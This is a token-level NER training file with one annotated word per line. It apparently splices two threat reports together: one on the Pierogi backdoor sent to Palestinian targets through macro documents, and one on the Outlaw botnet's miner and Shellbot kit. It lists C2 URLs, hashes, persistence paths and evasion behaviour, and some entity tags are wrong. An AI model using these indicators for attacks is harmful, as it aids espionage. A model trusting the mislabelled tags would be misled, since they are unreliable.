+a O
+resolution O
+by O
+the O
+Asian B-IDTY
+Parliamentary I-IDTY
+Assembly E-IDTY
+( O
+APA S-IDTY
+) O
+held O
+in O
+Anatalya S-LOC
+, O
+announcing O
+unlimited O
+support O
+for O
+the O
+Palestinian O
+people O
+7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c S-SHA2
+. O
+jalsa.rar S-FILE
+: O
+
+Contains O
+the O
+above O
+mentioned O
+document O
+, O
+as O
+well O
+as O
+photos O
+of O
+the O
+assemblies O
+and O
+political O
+cartoons O
+criticizing O
+Hamas S-LOC
+50a597aa557084e938e2a987ec5db99187428091e8141e616cced72e6a39de1b S-SHA2
+. O
+
+Internet B-FILE
+in I-FILE
+government.pdf E-FILE
+/ O
+Define B-FILE
+the I-FILE
+Internet I-FILE
+in I-FILE
+government I-FILE
+institutions.pdf E-FILE
+: O
+
+Announcement O
+about O
+a O
+new O
+regulation O
+regarding O
+internet O
+usage O
+in O
+Palestinian B-IDTY
+government E-IDTY
+institutions O
+. O
+
+The O
+announcement O
+states O
+that O
+porn O
+, O
+gambling O
+and O
+entertainment O
+sites O
+will O
+be O
+blocked O
+9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2
+. O
+
+Congratulations_Jan-7.pdf S-FILE
+: O
+
+Letter O
+allegedly O
+from O
+the O
+Barcelona B-IDTY B-LOC
+branch E-LOC E-IDTY
+of O
+the O
+
+Federation B-IDTY
+of I-IDTY
+Independent I-IDTY
+Palestinian I-IDTY
+Communities I-IDTY
+and I-IDTY
+Organizations I-IDTY
+and I-IDTY
+Events E-IDTY
+in O
+the O
+Diaspora O
+. O
+
+The O
+letter O
+commemorates O
+the O
+73rd O
+anniversary O
+of O
+the O
+Syrian B-IDTY
+Army E-IDTY
+, O
+and O
+expresses O
+the O
+Palestinian O
+support O
+of O
+Bashar O
+Al-Asad O
+. O
+
+The O
+letter O
+ends O
+with O
+“ O
+Death O
+to O
+Israel O
+” O
+and O
+“ O
+Humiliation O
+and O
+shame O
+to O
+the O
+tyrant O
+America O
+” O
+65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc S-SHA2
+. O
+
+Daily_Report.docx S-FILE
+: O
+
+Daily O
+summary O
+of O
+news O
+concerning O
+different O
+Palestinian B-IDTY
+govenment E-IDTY
+related O
+issues O
+d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 S-SHA2
+. O
+
+Directory B-FILE
+of I-FILE
+Government I-FILE
+Services.pdf E-FILE
+: O
+
+A O
+screenshot O
+from O
+a O
+website O
+of O
+the O
+Palestinian B-IDTY
+government E-IDTY
+, O
+showing O
+a O
+directory O
+of O
+the O
+different O
+ministries O
+9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 S-SHA2
+. O
+
+Meeting B-FILE
+Agenda.pdf E-FILE
+: O
+
+Corrupted O
+file O
+f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 S-SHA2
+. O
+imgonline-com-ua-dexifEEdWuIbNSv7G.jpg S-FILE
+: O
+
+potentially O
+leaked O
+Hamas S-LOC
+document O
+detailing O
+Hamas S-LOC
+32nd O
+anniversary O
+expenses O
+in O
+different O
+regions O
+in O
+the O
+Palestinian B-LOC
+Territories E-LOC
+932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb S-SHA2
+. O
+
+Asala.mp3 S-FILE
+: O
+
+An O
+.mp3 S-FILE
+file O
+of O
+a O
+song O
+by O
+the O
+famous O
+Syrian S-LOC
+singer O
+Asala O
+Nasri O
+( O
+song O
+name O
+: O
+Fen O
+Habibi O
+, O
+translation O
+: O
+“ O
+where O
+is O
+my O
+loved O
+one? O
+” O
+) O
+4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 S-SHA2
+. O
+
+In O
+addition O
+to O
+the O
+documents O
+, O
+the O
+content O
+includes O
+a O
+number O
+of O
+political O
+cartoons O
+that O
+criticize O
+Hamas S-LOC
+’ O
+relations O
+with O
+Iran S-LOC
+and O
+Hamas S-LOC
+’ O
+standing O
+as O
+a O
+resistance O
+movement O
+. O
+
+While O
+the O
+majority O
+of O
+infections O
+in O
+this O
+campaign O
+did O
+not O
+originate O
+from O
+Malicious B-TOOL
+Microsoft I-TOOL
+Word I-TOOL
+document E-TOOL
+, O
+the O
+Cybereason B-SECTEAM
+Nocturnus E-SECTEAM
+team O
+found O
+several O
+weaponized B-TOOL
+Microsoft I-TOOL
+Word I-TOOL
+document E-TOOL
+with O
+an O
+embedded O
+downloader B-TOOL
+macro E-TOOL S-TOOL
+that O
+downloads O
+and O
+installs O
+the O
+backdoor S-MAL
+used O
+in O
+this O
+attack O
+. O
+
+CV B-FILE
+Manal I-FILE
+1 E-FILE
+: O
+
+Resume O
+of O
+a O
+woman O
+from O
+Abu-Dis S-LOC
+, O
+Palestinian B-IDTY
+Authority E-IDTY
+4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f S-SHA2
+. O
+
+Employee-entitlements-2020.doc S-FILE
+: O
+
+A O
+statement O
+of O
+the O
+Ministry B-IDTY
+of I-IDTY
+Finance E-IDTY
+on O
+civil O
+and O
+military O
+employee O
+benefits O
+and O
+salaries O
+, O
+discussing O
+the O
+conterversial O
+issue O
+Palestinian B-IDTY
+Authority E-IDTY
+employees O
+that O
+have O
+not O
+been O
+paid O
+or O
+paid O
+in O
+full O
+their O
+salaries O
+b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 S-SHA2
+. O
+
+When O
+the O
+victims O
+open O
+the O
+document O
+, O
+they O
+are O
+encouraged O
+to O
+click O
+on O
+Enable O
+Content O
+, O
+which O
+causes O
+the O
+embedded O
+malicious B-TOOL
+macro E-TOOL S-TOOL
+code O
+to O
+run O
+. O
+
+The O
+macro O
+code O
+embedded O
+in O
+the O
+document O
+is O
+rather O
+simple O
+and O
+is O
+not O
+obfuscated O
+. O
+
+In O
+fact O
+, O
+it O
+is O
+almost O
+unusual O
+in O
+its O
+unsophistication O
+. O
+
+The O
+macro O
+code O
+does O
+the O
+following O
+: O
+
+Downloads O
+a O
+Base64 S-ENCR
+encoded O
+payload O
+from O
+the O
+following O
+URL O
+: O
+
+http://linda-callaghan.icu/Minkowski/brown S-URL
+. O
+
+Writes O
+the O
+decoded O
+payload O
+to O
+C:\ProgramData\IntegratedOffice.txt O
+. O
+
+Decodes O
+the O
+Base64 S-ENCR
+payload O
+and O
+writes O
+the O
+file O
+to O
+C:\ProgramData\IntegratedOffice.exe S-FILE
+. O
+
+Runs O
+the O
+executable O
+file O
+and O
+deletes O
+the O
+.txt S-FILE
+file O
+. O
+
+Pierogi S-MAL
+, O
+the O
+backdoor S-MAL
+in O
+this O
+attack O
+, O
+appears O
+to O
+be O
+a O
+new O
+backdoor S-TOOL
+written O
+in O
+Delphi S-TOOL
+. O
+
+It O
+enables O
+the O
+attackers O
+to O
+spy O
+on O
+victims O
+using O
+rather O
+basic O
+backdoor S-MAL
+capabilities O
+. O
+
+While O
+it O
+is O
+unknown O
+at O
+this O
+point O
+whether O
+the O
+backdoor S-MAL
+was O
+coded O
+by O
+the O
+same O
+members O
+of O
+the O
+group O
+behind O
+the O
+attacks O
+, O
+there O
+are O
+indications O
+that O
+suggest O
+that O
+the O
+malware O
+was O
+authored O
+by O
+Ukranian-speaking O
+malware O
+developers O
+. O
+
+The O
+commands O
+used O
+to O
+communicate O
+with O
+the O
+C2 S-TOOL
+servers O
+and O
+other O
+strings O
+in O
+the O
+binary O
+are O
+written O
+in O
+Ukrainian O
+. O
+
+This O
+is O
+why O
+we O
+chose O
+to O
+name O
+the O
+malware O
+Pierogi S-MAL
+, O
+after O
+the O
+popular O
+East B-LOC
+European E-LOC
+dish O
+. O
+
+The O
+backdoor O
+has O
+the O
+following O
+capabilities O
+: O
+
+Collects O
+information O
+about O
+the O
+infected O
+machine O
+. O
+
+Uploads O
+files O
+to O
+the O
+attackers O
+’ O
+server O
+. O
+
+Downloads O
+additional O
+payloads O
+. O
+
+Takes O
+screenshots O
+from O
+the O
+infected O
+machine O
+. O
+
+Executes O
+arbitrary O
+commands O
+via O
+the O
+CMD B-TOOL
+shell E-TOOL
+. O
+
+In O
+addition O
+to O
+spy O
+features O
+, O
+the O
+backdoor S-MAL
+also O
+implements O
+a O
+few O
+checks O
+to O
+ensure O
+it O
+is O
+running O
+in O
+a O
+safe O
+environment O
+. O
+
+Specifically O
+, O
+it O
+looks O
+for O
+antivirus O
+and O
+other O
+security O
+products O
+. O
+
+The O
+backdoor S-MAL
+queries O
+Windows S-OS
+for O
+installed O
+antivirus O
+software O
+using O
+WMI S-TOOL
+: O
+SELECT O
+* O
+FROM O
+AntiVirusProduct O
+It O
+looks O
+for O
+specific O
+antivirus O
+and O
+security O
+products O
+installed O
+on O
+the O
+infected O
+machine O
+, O
+such O
+as O
+Kaspersky S-MAL
+, O
+eScan S-MAL
+, O
+F-secure S-MAL
+and O
+Bitdefender S-MAL
+. O
+
+The O
+backdoor S-MAL
+achieves O
+persistence O
+using O
+a O
+classic O
+startup O
+item O
+autorun O
+technique O
+: O
+
+A O
+shortcut O
+is O
+added O
+to O
+the O
+the O
+startup O
+folder O
+: O
+C:\Users\User\AppData\Roaming\Microsoft\Windows\Start O
+Menu\Programs\Startup O
+. O
+
+Once O
+the O
+user O
+logs O
+on O
+to O
+the O
+infected O
+machine O
+, O
+the O
+shortcut O
+points O
+to O
+the O
+file O
+binary O
+location O
+in O
+the O
+C:\ProgramData\ O
+folder O
+. O
+
+The O
+GUID S-TOOL
+generated O
+by O
+the O
+malware O
+is O
+saved O
+in O
+a O
+file O
+called O
+GUID.bin S-FILE
+. O
+
+This O
+file O
+is O
+created O
+in O
+the O
+same O
+folder O
+as O
+the O
+binary O
+of O
+the O
+backdoor S-MAL
+
+( O
+C:\ProgramData\GUID.bin O
+) O
+. O
+
+The O
+backdoor S-MAL
+has O
+rather O
+basic O
+C2 S-TOOL
+functionality O
+implemented O
+through O
+a O
+predefined O
+set O
+of O
+URLs O
+: O
+
+1 O
+. O
+
+Sending O
+machine O
+information O
+and O
+a O
+heartbeat O
+to O
+the O
+C2 S-TOOL
+: O
+
+URL O
+: O
+http://nicoledotson.icu/debby/weatherford/Yortysnr S-URL
+The O
+information O
+sent O
+to O
+the O
+C2 S-TOOL
+includes O
+: O
+
+cname O
+: O
+
+computer O
+name O
+, O
+username O
+, O
+and O
+GUID S-TOOL
+. O
+av O
+: O
+Name O
+of O
+detected O
+antivirus O
+. O
+osversion O
+: O
+version O
+of O
+the O
+operating O
+system O
+. O
+aname O
+: O
+the O
+location O
+of O
+the O
+malware O
+on O
+the O
+infected O
+machine O
+. O
+
+Requesting O
+commands O
+from O
+the O
+C2 S-TOOL
+server O
+: O
+
+URL O
+: O
+http://nicoledotson.icu/debby/weatherford/Ekspertyza S-URL
+. O
+
+Ekspertyza O
+means O
+expertise O
+or O
+examination O
+in O
+Ukranian O
+. O
+
+There O
+are O
+3 O
+basic O
+commands O
+coming O
+from O
+the O
+server O
+in O
+the O
+form O
+of O
+MD5 S-ENCR
+hashes O
+: O
+
+Dfff0a7fa1a55c8c1a4966c19f6da452 S-MD5
+: O
+cmd O
+. O
+51a7a76a7dd5d9e4651fe3d4c74d16d6 S-SHA2
+: O
+downloadfile O
+. O
+62c92ba585f74ecdbef4c4498a438984 S-SHA2
+: O
+screenshot O
+. O
+
+Uploading O
+data O
+( O
+mainly O
+screenshots O
+) O
+to O
+the O
+C2 S-TOOL
+: O
+
+URL O
+: O
+http://nicoledotson.icu/debby/weatherford/Zavantazhyty S-URL
+. O
+
+Zavantazhyty O
+means O
+to O
+load O
+or O
+download O
+in O
+Ukranian O
+. O
+
+This O
+command O
+is O
+used O
+to O
+upload O
+collected O
+data O
+to O
+the O
+C2 S-TOOL
+server O
+. O
+
+For O
+example O
+, O
+in O
+some O
+instances O
+the O
+backdoor S-MAL
+uploads O
+screenshots O
+taken O
+from O
+an O
+infected O
+machine O
+, O
+as O
+can O
+be O
+seen O
+in O
+the O
+example O
+below O
+. O
+
+Removing O
+information O
+: O
+
+URL O
+: O
+http://nicoledotso.icu/debby/weatherford/Vydalyty S-URL
+. O
+
+Vydalyty O
+means O
+to O
+remove O
+or O
+delete O
+in O
+Ukrainian O
+. O
+
+The O
+malware O
+can O
+delete O
+various O
+requests O
+based O
+on O
+the O
+command O
+below O
+. O
+
+The O
+records O
+of O
+the O
+domains O
+and O
+IPs O
+involved O
+in O
+this O
+campaign O
+seem O
+to O
+show O
+that O
+the O
+attackers O
+created O
+a O
+new O
+infrastructure O
+specifically O
+for O
+this O
+campaign O
+. O
+
+The O
+domains O
+were O
+registered O
+in O
+November B-TIME
+2019 E-TIME
+and O
+operationalized O
+shortly O
+after O
+. O
+
+In O
+part O
+two O
+of O
+this O
+research O
+, O
+we O
+examined O
+the O
+Pierogi B-ACT S-MAL I-ACT
+campaign E-ACT
+. O
+
+Cybereason S-SECTEAM
+suspects O
+this O
+
+campaign O
+targets O
+Palestinian O
+individuals O
+and O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+, O
+specifically O
+directed O
+at O
+
+those O
+in O
+the O
+Palestinian B-IDTY
+government E-IDTY
+. O
+
+The O
+threat O
+actors O
+behind O
+the O
+campaign O
+use O
+social O
+engineering O
+to O
+infect O
+their O
+victims O
+with O
+the O
+Pierogi B-MAL
+backdoor E-MAL
+for O
+cyber O
+espionage O
+purposes O
+. O
+
+The O
+threat O
+actor O
+behind O
+the O
+attack O
+invested O
+considerable O
+time O
+and O
+effort O
+to O
+lure O
+their O
+victims O
+with O
+specially-crafted O
+documents O
+that O
+target O
+Palestinian O
+individuals O
+and O
+entities O
+in O
+the O
+Middle B-LOC
+East E-LOC
+. O
+
+In O
+our O
+analysis O
+, O
+we O
+reviewed O
+the O
+TTPs O
+and O
+the O
+decoy O
+content O
+, O
+and O
+pointed O
+out O
+the O
+similarities O
+between O
+previous O
+attacks O
+that O
+have O
+been O
+attributed O
+to O
+MoleRATs S-APT
+, O
+an O
+Arabic-speaking O
+, O
+politically O
+motivated O
+group O
+that O
+has O
+operated O
+
+in O
+the O
+Middle B-LOC
+East E-LOC
+since O
+2012 S-TIME
+. O
+
+The O
+Pierogi B-MAL
+backdoor E-MAL
+discovered O
+by O
+Cybereason S-SECTEAM
+during O
+this O
+investigation O
+seems O
+to O
+be O
+undocumented O
+and O
+gives O
+the O
+threat O
+actors O
+espionage O
+capabilities O
+over O
+their O
+victims O
+. O
+
+Based O
+on O
+the O
+Ukranian O
+language O
+embedded O
+in O
+the O
+backdoor S-MAL
+, O
+Cybereason S-SECTEAM
+raises O
+the O
+possibility O
+that O
+the O
+backdoor S-MAL
+was O
+obtained O
+in O
+underground O
+communities O
+by O
+the O
+threat O
+actors O
+, O
+rather O
+than O
+developed O
+in-house O
+by O
+the O
+group O
+. O
+
+
+Outlaw S-APT
+Updates O
+Kit O
+to O
+Kill O
+Older O
+Miner O
+Versions O
+, O
+Targets O
+More O
+Systems O
+. O
+
+As O
+we O
+’ve O
+observed O
+with O
+cybercriminal O
+groups O
+that O
+aim O
+to O
+maximize O
+profits O
+for O
+every O
+campaign O
+, O
+silence O
+does O
+n’t O
+necessarily O
+mean O
+inactivity O
+. O
+
+It O
+appears O
+hacking O
+group O
+Outlaw S-APT
+, O
+which O
+has O
+been O
+silent O
+for O
+the O
+past O
+few O
+months O
+, O
+was O
+simply O
+developing O
+their O
+toolkit O
+for O
+illicit O
+income O
+sources O
+. O
+
+While O
+they O
+have O
+been O
+quiet O
+since O
+our O
+June O
+analysis O
+, O
+we O
+observed O
+an O
+increase O
+in O
+the O
+group O
+’s O
+activities O
+in O
+December S-TIME
+, O
+with O
+updates O
+on O
+the O
+kits O
+’ O
+capabilities O
+reminiscent O
+of O
+their O
+previous O
+attacks O
+. O
+
+The O
+updates O
+expanded O
+scanner O
+parameters O
+and O
+targets O
+, O
+looped O
+execution O
+of O
+files O
+via O
+error O
+messages O
+, O
+improved O
+evasion O
+techniques O
+for O
+scanning O
+activities O
+, O
+and O
+improved O
+mining O
+profits O
+by O
+killing O
+off O
+both O
+the O
+competition O
+and O
+their O
+own O
+previous O
+miners O
+. O
+
+We O
+analyzed O
+the O
+kits O
+, O
+which O
+were O
+designed O
+to O
+steal O
+information O
+from O
+the O
+automotive O
+and O
+finance O
+industries O
+, O
+launch O
+subsequent O
+attacks O
+on O
+already O
+compromised O
+systems O
+, O
+and O
+( O
+possibly O
+) O
+sell O
+stolen O
+information O
+. O
+
+Comparing O
+this O
+development O
+to O
+their O
+previous O
+attacks O
+, O
+we O
+think O
+Outlaw S-APT
+may O
+be O
+aiming O
+to O
+go O
+after O
+enterprises O
+that O
+have O
+yet O
+to O
+update O
+their O
+systems O
+, O
+assessing O
+security O
+and O
+changes O
+with O
+their O
+previously O
+infected O
+hosts O
+, O
+finding O
+new O
+and O
+old O
+targets O
+, O
+and O
+possibly O
+testing O
+their O
+updates O
+in O
+the O
+wild O
+. O
+
+We O
+will O
+continue O
+to O
+observe O
+the O
+group O
+’s O
+activities O
+as O
+they O
+target O
+industries O
+from O
+the B-LOC
+United I-LOC
+States E-LOC
+and O
+Europe S-LOC
+. O
+
+Based O
+on O
+the O
+samples O
+we O
+collected O
+and O
+traced O
+to O
+456 O
+distinct O
+IPs O
+, O
+we O
+expect O
+the O
+group O
+to O
+be O
+more O
+active O
+in O
+the O
+coming O
+months O
+as O
+we O
+observed O
+changes O
+on O
+the O
+versions O
+we O
+acquired O
+. O
+
+These O
+new O
+samples O
+targeted O
+Linux- S-OS
+and O
+Unix-based B-OS
+operating I-OS
+systems E-OS
+, O
+vulnerable O
+servers O
+, O
+and O
+internet O
+of O
+things O
+( O
+IoT O
+) O
+devices O
+by O
+exploiting O
+known O
+vulnerabilities O
+with O
+available O
+exploits O
+. O
+
+This O
+time O
+, O
+the O
+group O
+explored O
+unpatched O
+systems O
+vulnerable O
+to O
+CVE-2016-8655 S-VULID
+and O
+Dirty B-VULNAME
+COW E-VULNAME
+exploit O
+( O
+CVE-2016-5195 S-VULID
+) O
+as O
+attack O
+vectors O
+. O
+
+Files O
+using O
+simple O
+PHP-based O
+web O
+shells O
+were O
+also O
+used O
+to O
+attack O
+systems O
+with O
+weak O
+SSH S-PROT
+and O
+Telnet S-PROT
+credentials O
+. O
+
+While O
+no O
+phishing- O
+or O
+social O
+engineering-initiated O
+routines O
+were O
+observed O
+in O
+this O
+campaign O
+, O
+we O
+found O
+multiple O
+attacks O
+over O
+the O
+network O
+that O
+are O
+considered O
+“ O
+loud. O
+” O
+These O
+involved O
+large-scale O
+scanning O
+operations O
+of O
+IP O
+ranges O
+intentionally O
+launched O
+from O
+the O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+( O
+C&C O
+) O
+server O
+. O
+
+The O
+honeynet O
+graphs O
+, O
+which O
+show O
+activity O
+peaks O
+associated O
+with O
+specific O
+actions O
+, O
+also O
+suggest O
+that O
+the O
+scans O
+were O
+timed O
+. O
+
+We O
+also O
+considered O
+the O
+move O
+as O
+an O
+obfuscation O
+technique O
+, O
+as O
+it O
+was O
+mixed O
+with O
+a O
+lot O
+of O
+script O
+kiddie O
+activities O
+that O
+can O
+easily O
+be O
+mistaken O
+for O
+grey O
+noise O
+online O
+. O
+
+The O
+attackers O
+could O
+hide O
+their O
+activities O
+if O
+they O
+noted O
+the O
+business O
+hours O
+of O
+the O
+intended O
+targets O
+and O
+performed O
+the O
+actions O
+coinciding O
+with O
+said O
+times O
+. O
+
+From O
+the O
+sample O
+we O
+analyzed O
+, O
+attacks O
+started O
+from O
+one O
+virtual B-TOOL
+private I-TOOL
+server E-TOOL
+( O
+VPS S-TOOL
+) O
+that O
+searches O
+for O
+a O
+vulnerable O
+machine O
+to O
+compromise O
+( O
+previous O
+techniques O
+used O
+malicious O
+URLs O
+or O
+infecting O
+legitimate O
+websites O
+for O
+bot O
+propagation O
+) O
+. O
+
+Once O
+infected O
+, O
+the O
+C&C S-TOOL
+commands O
+for O
+the O
+infected O
+system O
+launches O
+a O
+loud O
+scanning O
+activity O
+and O
+spreads O
+the O
+botnet O
+by O
+sending O
+a O
+“ O
+whole O
+kit O
+” O
+of O
+binary O
+files O
+at O
+once O
+with O
+naming O
+conventions O
+same O
+as O
+the O
+ones O
+already O
+in O
+the O
+targeted O
+host O
+, O
+likely O
+banking O
+on O
+breaking O
+through O
+via O
+“ O
+security O
+through O
+obscurity. O
+” O
+They O
+attempted O
+to O
+evade O
+traffic O
+inspection O
+by O
+encoding O
+the O
+code O
+for O
+the O
+scanner O
+with O
+base-64 S-ENCR
+. O
+
+The O
+zombie O
+host O
+initiates O
+the O
+scan O
+— O
+another O
+routine O
+from O
+previous O
+campaigns O
+— O
+but O
+updated O
+with O
+a O
+larger O
+set O
+of O
+parameters O
+and O
+programmed O
+to O
+run O
+in O
+the O
+background O
+. O
+
+The O
+kit O
+we O
+found O
+is O
+in O
+tgz O
+format O
+, O
+though O
+we O
+have O
+observed O
+some O
+samples O
+disguised O
+as O
+png O
+or O
+jpg O
+. O
+
+While O
+previous O
+routines O
+took O
+advantage O
+of O
+competing O
+miners O
+’ O
+activities O
+and O
+unrelated O
+components O
+to O
+hijack O
+the O
+profit O
+, O
+the O
+latest O
+version O
+of O
+the O
+code O
+attempts O
+to O
+remove O
+all O
+related O
+files O
+and O
+codes O
+from O
+previous O
+infections O
+( O
+including O
+their O
+own O
+to O
+make O
+sure O
+the O
+running O
+components O
+are O
+updated O
+, O
+as O
+well O
+as O
+those O
+from O
+other O
+cybercriminals O
+to O
+maximize O
+the O
+resources O
+of O
+the O
+zombie O
+host O
+) O
+and O
+creates O
+a O
+new O
+working O
+directory O
+/tmp/.X19-unix O
+to O
+move O
+the O
+kit O
+and O
+extract O
+the O
+files O
+. O
+
+The O
+tsm O
+binary O
+then O
+runs O
+in O
+the O
+background O
+, O
+forwarding O
+a O
+series O
+of O
+error O
+messages O
+to O
+/dev/null O
+to O
+keep O
+the O
+code O
+running O
+, O
+ensuring O
+the O
+continuous O
+execution O
+of O
+the O
+code O
+referenced O
+with O
+a O
+set O
+of O
+parameters O
+/tmp/up.txt O
+. O
+
+The O
+script O
+then O
+waits O
+20 O
+minutes O
+before O
+it O
+runs O
+the O
+wrapper O
+script O
+initall S-FILE
+: O
+
+2e2c9d08c7c955f6ce5e27e70b0ec78a888c276d71a72daa0ef9e3e40f019a1a S-SHA2
+install S-FILE
+. O
+
+Another O
+variant O
+executes O
+a O
+set O
+of O
+commands O
+once O
+a O
+system O
+is O
+successfully O
+compromised O
+. O
+
+Most O
+of O
+these O
+commands O
+are O
+related O
+to O
+gathering O
+information O
+from O
+the O
+infected O
+machine O
+( O
+number O
+of O
+CPU O
+cores O
+, O
+users O
+, O
+scheduled O
+tasks O
+, O
+running O
+processes O
+, O
+OS O
+installed O
+, O
+and O
+CPU O
+and O
+memory O
+information O
+) O
+via O
+the O
+dota3 S-TOOL
+payload O
+, O
+as O
+well O
+as O
+changing O
+the O
+password O
+to O
+a O
+random O
+string O
+also O
+stored O
+in O
+/tmp/up.txt O
+. O
+
+In O
+a O
+previous O
+execution O
+( O
+published O
+in O
+June B-TIME
+2019 E-TIME
+) O
+, O
+we O
+observed O
+that O
+dota2 S-TOOL
+had O
+its O
+own O
+folder O
+but O
+it O
+was O
+hardly O
+executed O
+, O
+indicating O
+that O
+this O
+version O
+is O
+the O
+updated O
+iteration O
+. O
+
+Running O
+the O
+script O
+removes O
+the O
+remaining O
+files O
+and O
+scripts O
+from O
+previous O
+attacks O
+, O
+keeping O
+a O
+low O
+profile O
+to O
+evade O
+detection O
+. O
+
+If O
+the O
+system O
+has O
+been O
+previously O
+infected O
+with O
+a O
+cryptominer O
+, O
+it O
+also O
+attempts O
+to O
+kill O
+the O
+running O
+miner O
+and O
+all O
+its O
+related O
+activities O
+. O
+
+Based O
+on O
+a O
+bashtemp O
+directory O
+of O
+the O
+latest O
+sample O
+we O
+found O
+, O
+there O
+are O
+other O
+compiled O
+ELF S-TOOL
+scripts O
+, O
+named O
+init S-FILE
+and O
+init2 S-FILE
+, O
+that O
+loops O
+the O
+kit O
+to O
+keep O
+running O
+: O
+
+0c458dfe0a2a01ab300c857fdc3373b75fbb8ccfa23d16eff0d6ab888a1a28f6 O
+
+ S-SHA2init S-FILE
+. O
+93ce211a71867017723cd78969aa4cac9d21c3d8f72c96ee3e1b2712c0eea494 O
+
+ S-SHA2init2 S-FILE
+. O
+
+Both O
+init S-FILE
+and O
+init2 S-FILE
+scripts O
+make O
+sure O
+all O
+other O
+running O
+mining O
+services O
+are O
+killed O
+, O
+and O
+that O
+all O
+the O
+files O
+in O
+the O
+working O
+directory O
+are O
+executed O
+by O
+giving O
+777 O
+permissions O
+. O
+
+We O
+also O
+found O
+the O
+init0 S-FILE
+script O
+running O
+; O
+the O
+script O
+cleans O
+out O
+all O
+miners O
+regardless O
+of O
+its O
+origin O
+. O
+
+It O
+then O
+resets O
+cron O
+and O
+removes O
+possible O
+cache O
+files O
+from O
+other O
+programs O
+, O
+starts O
+scripts O
+and O
+binaries O
+a S-FILE
+, O
+init0 S-FILE
+, O
+and O
+start O
+, O
+and O
+sets O
+the O
+persistence O
+by O
+modifying O
+the O
+crontab O
+. O
+
+The O
+a O
+binary O
+is O
+a O
+script B-TOOL
+wrapper E-TOOL
+to O
+start O
+run O
+, O
+a O
+Perl-obfuscated B-TOOL
+script E-TOOL
+for O
+installation O
+of O
+a O
+Shellbot S-MAL
+to O
+gain O
+control O
+of O
+the O
+infected O
+system O
+. O
+
+The O
+Shellbot S-MAL
+disguises O
+itself O
+as O
+a O
+process O
+named O
+rsync O
+, O
+commonly O
+the O
+binary O
+seen O
+on O
+many O
+Unix- S-OS
+and O
+Linux-based B-OS
+systems E-OS
+to O
+automatically O
+run O
+for O
+backup O
+and O
+synchronization O
+. O
+
+This O
+allows O
+the O
+malicious O
+activity O
+to O
+evade O
+detection O
+. O
+
+The O
+Shellbot S-MAL
+script O
+is O
+added O
+to O
+run O
+after O
+the O
+victim O
+’s O
+system O
+reboots O
+, O
+and O
+scripts O
+/a/upd O
+, O
+/b/sync/ O
+, O
+and O
+/c/aptitude/ O
+are O
+added O
+to O
+the O
+crontab O
+. O
+
+However O
+, O
+while O
+we O
+observed O
+the O
+presence O
+of O
+the O
+codes O
+, O
+the O
+functions O
+of O
+upd O
+, O
+sync O
+and O
+aptitude O
+were O
+disabled O
+in O
+the O
+kits O
+’ O
+latest O
+version O
+. O
+
+It O
+remains O
+unclear O
+whether O
+these O
+are O
+leftover O
+code O
+from O
+the O
+previous O
+versions O
+or O
+their O
+particular O
+purposes O
+were O
+served O
+. O
+
+Shellbot S-MAL
+is O
+also O
+used O
+to O
+control O
+the O
+botnet S-MAL
+, O
+with O
+a O
+command O
+that O
+is O
+sent O
+and O
+run O
+from O
+the O
+C&C S-TOOL
+to O
+determine O
+if O
+there O
+is O
+a O
+code O
+execution O
+in O
+the O
+shell O
+, O
+the O
+hostname O
+, O
+and O
+its O
+architecture O
+. O
+
+All O
+results O
+and O
+system O
+information O
+collected O
+from O
+the O
+infected O
+system O
+are O
+stored O
+locally O
+in O
+the O
+device O
+for O
+a O
+period O
+before O
+Outlaw S-APT
+retrieves O
+them O
+via O
+the O
+C&C S-TOOL
+. O
+
+We O
+also O
+found O
+traces O
+of O
+Android B-TOOL
+Package I-TOOL
+Kits- E-TOOL
+( O
+APK- S-TOOL
+) O
+and O
+Android B-TOOL
+Debug I-TOOL
+Bridge E-TOOL
+( O
+ADB S-TOOL
+)-based O
+commands O
+that O
+enable O
+cryptocurrency O
+mining O
+activities O
+in O
+Android-based B-TOOL
+TVs E-TOOL
+. O
+
+Since O
+discovering O
+the O
+operations O
+of O
+this O
+group O
+in O
+2018 S-TIME
+, O
+Outlaw S-APT
+continues O
+to O
+use O
+scripts O
+, O
+codes O
+, O
+and O
+commands O
+that O
+have O
+been O
+previously O
+used O
+and O
+deployed O
+. O
+
+These O
+routines O
+are O
+indicative O
+of O
+the O
+group O
+’s O
+aim O
+to O
+get O
+quantitative O
+returns O
+through O
+varied O
+cybercriminal O
+profit O
+streams O
+. O
+
+This O
+was O
+also O
+reinforced O
+by O
+their O
+naming O
+conventions O
+, O
+wherein O
+different O
+versions O
+are O
+simply O
+named O
+after O
+the O
+code O
+iterations O
+, O
+following O
+a O
+specific O
+format O
+regardless O
+of O
+the O
+actual O
+function O
+of O
+the O
+code O
+. O
+
+Furthermore O
+, O
+based O
+on O
+the O
+group O
+’s O
+use O
+of O
+dated O
+exploits O
+as O
+vectors O
+that O
+companies O
+would O
+have O
+likely O
+addressed O
+with O
+monitoring O
+and O
+regular O
+patching O
+schedules O
+, O
+it O
+appears O
+that O
+they O
+’re O
+going O
+after O
+enterprises O
+who O
+have O
+yet O
+to O
+patch O
+their O
+systems O
+, O
+as O
+well O
+as O
+companies O
+with O
+internet-facing O
+systems O
+with O
+weak O
+to O
+no O
+monitoring O
+of O
+traffic O
+and O
+activities O
+. O
+
+Considering O
+the O
+amount O
+of O
+resources O
+needed O
+to O
+deploy O
+all O
+the O
+necessary O
+patches O
+for O
+an O
+enterprise O
+( O
+such O
+as O
+quality O
+testing O
+and O
+operations O
+alignment O
+) O
+, O
+which O
+implies O
+costly O
+downtime O
+for O
+operations O
+and O
+the O
+hesitation O
+to O
+update O
+all O
+systems O
+immediately O
+, O
+Outlaw S-APT
+may O
+find O
+even O
+more O
+targets O
+and O
+victims O
+for O
+their O
+updated O
+botnets O
+every O
+time O
